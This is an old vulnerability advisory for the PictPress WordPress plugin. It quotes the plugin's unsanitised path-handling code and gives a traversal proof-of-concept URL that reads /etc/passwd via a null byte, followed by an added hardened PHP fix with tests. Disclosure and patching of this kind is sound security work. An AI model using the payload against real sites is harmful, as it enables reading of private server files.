# Title : Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
# Published : 2007-12-05
# Author : GoLd_M
Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
Download Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In lines 5, 6, 7, 8 :
$path = $_GET['path'];
$size = $_GET['size'];
$base = dirname(__FILE__) . "/..";
$cache = "$base/cache/$size/$path";
In line 22 :
readfile($cache);
POC :
/wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00
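Hardened form of the path handling quoted above, as an added example (not code from the plugin or from the advisory author). It validates size, canonicalises the joined path and checks that it stays inside the cache directory before anything is read. The function name resolve_cache_file, the allowed pattern for size and the temporary demo tree are assumptions.

```php
<?php
// Added example: hardened lookup for the cache file that resize.php serves.
// Assumption: size values are short alphanumeric labels; the plugin's real
// set of valid sizes is not shown on this page.

function resolve_cache_file(string $cacheRoot, string $size, string $path): ?string
{
    // Reject NUL bytes outright (the %00 suffix used in the POC).
    if (strpos($size, "\0") !== false || strpos($path, "\0") !== false) {
        return null;
    }
    // size must be a single plain directory name, never a path.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $size)) {
        return null;
    }
    $root = realpath($cacheRoot);
    if ($root === false) {
        return null;
    }
    // Canonicalise: realpath() resolves "..", "." and symlinks, and returns
    // false when the target does not exist.
    $full = realpath($root . DIRECTORY_SEPARATOR . $size . DIRECTORY_SEPARATOR . $path);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so
    // that "/cache-evil" does not pass as a child of "/cache".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Self-check against a throwaway cache tree (constructed sample data).
$root = sys_get_temp_dir() . '/pictpress_demo_' . bin2hex(random_bytes(4));
mkdir("$root/cache/thumb", 0700, true);
file_put_contents("$root/cache/thumb/a.jpg", 'img');
file_put_contents("$root/secret.txt", 'not for download');

$cases = [
    ['thumb', 'a.jpg'],                        // legitimate request
    ['../../../../', '/etc/passwd' . "\0"],    // shape of the request in the POC
    ['thumb', '../../secret.txt'],             // traversal through path only
];
foreach ($cases as [$size, $path]) {
    $hit = resolve_cache_file("$root/cache", $size, $path);
    printf("%-14s %-22s => %s\n", json_encode($size), json_encode($path), $hit ?? 'rejected');
}
```

Only the first case resolves to a file; readfile() should be called solely on a non-null return value.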